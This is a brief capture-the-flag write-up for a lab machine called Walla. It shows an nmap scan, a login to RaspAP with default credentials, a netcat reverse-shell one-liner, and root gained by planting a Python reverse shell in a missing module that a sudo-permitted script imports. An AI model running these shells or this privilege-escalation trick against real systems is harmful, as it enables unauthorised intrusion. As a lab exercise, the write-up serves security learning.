🐧Walla

IP: 192.168.116.97

Enumeration

Nmap scan

nmap  -p- 192.168.116.97 -sV -A

The only port that stands out on this machine is 8091. Found that this page is running RaspAP. Found that a quick google for RaspAP default credentials gets me into the site. admin:secret.

Found a nice console😈

Shell

Tried a few shells and one came through.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.116 4444 >/tmp/f

Dropped Linpeas on this machine and ran it. Interesting service we can edit.

Added a reverse shell script so when the service was ran it would spawn a shell. But no way to reboot the machine or restart the service.

Sudo -l

wifi_reset.py is missing the wificontroller.py module.

Made the module. Echoed reverse shell into wificontroller.py

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.116",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > wificontroller.py

Ran script.

sudo /usr/bin/python /home/walter/wifi_reset.py

Root